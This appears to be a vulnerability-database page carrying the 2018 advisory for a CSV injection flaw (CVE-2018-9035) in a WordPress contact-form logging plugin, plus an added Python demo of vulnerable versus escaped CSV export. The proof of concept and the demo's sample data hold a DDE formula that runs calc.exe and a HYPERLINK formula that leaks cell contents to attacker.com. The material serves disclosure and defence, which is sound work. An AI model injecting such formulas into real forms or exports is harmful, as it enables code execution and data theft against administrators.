| Title | Published | Views | Family |
|---|---|---|---|
| Wordpress Contact Form 7 to Database Extension 2.10.32 Plugin - CSV Injection Vulnerability | 30 Mar 2018 00:00 | – | zdt |
| CVE-2018-9035 | 4 Apr 2018 19:29 | – | attackerkb |
| CVE-2018-9035 | 22 Jun 2025 15:00 | – | circl |
| Wordpress Contact Form 7 to Database Extension Plugin CSV Injection Vulnerability | 2 Apr 2018 00:00 | – | cnvd |
| CVE-2018-9035 | 4 Apr 2018 19:00 | – | cve |
| CVE-2018-9035 | 4 Apr 2018 19:00 | – | cvelist |
| EUVD-2018-20639 | 7 Oct 2025 00:30 | – | euvd |
| WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection | 30 Mar 2018 00:00 | – | exploitpack |
| CVE-2018-9035 | 4 Apr 2018 19:29 | – | nvd |
| WordPress Contact Form 7 To Database Extension 2.10.32 CSV Injection | 31 Mar 2018 00:00 | – | packetstorm |
# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
# Date: 23-03-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: None
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
# Version: 2.10.32
# CVE : CVE-2018-9035
# Category : webapps
Description
===========
Contact Form 7 to Database Extension is a WordPress plugin with more than 400,000 active installations. Development has been discontinued for about a year. Version 2.10.32 (and possibly earlier versions) is affected by a CSV injection vulnerability.
Vulnerable part of code
=======================
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 writes each column value to the export verbatim, without checking whether it begins with a character that a spreadsheet application interprets as the start of a formula.
Impact
======
Arbitrary formulas can be injected into the exported CSV/Excel files.
When such a file is opened in a spreadsheet application, this can lead to code execution on the client (via DDE) or to data leakage through maliciously injected hyperlinks that send cell contents to an attacker-controlled server.
Proof of Concept
================
To exploit this vulnerability, the attacker submits a spreadsheet formula in any of the available contact form fields. The submission is stored in the plugin's log; when a WordPress administrator exports this log as an Excel/CSV file, the file contains the formula verbatim. When the administrator then opens the file in a spreadsheet application, the formula is evaluated.
Example:
=cmd|'/C calc.exe'!Z0
or
=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
Solution
========
The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats. The other characters that spreadsheet applications treat as formula triggers ('+', '-', '@', tab and carriage return) need the same treatment; a common approach is to prefix such values with a single quote so the cell is read as text. Quoting the cell in double quotes is not sufficient on its own, since Excel still evaluates the unquoted content as a formula.
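As an added illustration (not code from the plugin or from this advisory), the Python below reproduces the flaw described under "Vulnerable part of code" beside the escaping proposed under "Solution": a vulnerable export that writes stored submissions verbatim, a hardened export that neutralizes cells beginning with a formula trigger, and a check that flags stored submissions carrying such payloads. The sample submissions, field names and function names are constructed for this example; the two formulas in the sample data are the PoC payloads shown above.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice treat a cell as a formula
# (OWASP CSV injection guidance): '=', '+', '-', '@', tab and carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample submissions standing in for the plugin's stored form log.
# Rows 1 and 2 carry the two proof-of-concept payloads from the advisory.
FIELDS = ["name", "email", "message"]
SAMPLE_ROWS = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": "=cmd|'/C calc.exe'!Z0", "email": "x@example.com", "message": "pwn"},
    {"name": "Bob", "email": "bob@example.com",
     "message": '=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")'},
    {"name": "-1 + 1", "email": "c@example.com", "message": "@SUM(1,2)"},
]


def is_formula(value: str) -> bool:
    """True if a spreadsheet application would evaluate this cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize(value: str) -> str:
    """Prefix a single quote so the cell is read as text rather than a formula."""
    return "'" + value if is_formula(value) else value


def _write_csv(rows, fields, transform) -> str:
    # QUOTE_ALL wraps every cell in double quotes and doubles embedded quotes;
    # that alone does NOT stop Excel from evaluating a leading '='.
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: transform(str(row.get(k, ""))) for k in fields})
    return buf.getvalue()


def export_vulnerable(rows, fields) -> str:
    """Mirrors the flaw: stored values are written to the export verbatim."""
    return _write_csv(rows, fields, lambda v: v)


def export_hardened(rows, fields) -> str:
    """Fixed export: formula triggers are neutralized before writing."""
    return _write_csv(rows, fields, neutralize)


def cells_are_safe(csv_text: str) -> bool:
    """Parse an export back and confirm no cell starts with a formula trigger."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return not any(is_formula(v) for row in reader for v in row.values())


def flag_submissions(rows, fields):
    """Detection-side view: (row index, field) pairs carrying formula triggers."""
    return [(i, k) for i, row in enumerate(rows)
            for k in fields if is_formula(str(row.get(k, "")))]


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_vulnerable(SAMPLE_ROWS, FIELDS))
    print("--- hardened export ---")
    print(export_hardened(SAMPLE_ROWS, FIELDS))
    print("flagged submissions:", flag_submissions(SAMPLE_ROWS, FIELDS))
```

Note that the single-quote prefix also catches legitimate values such as "-1 + 1" in the sample data; an export routine that needs numeric columns to stay numeric should exempt values that parse as numbers. The flagging function is useful on the storage side as well: if the plugin's log already contains such submissions, an export produced before the fix should be treated as hostile.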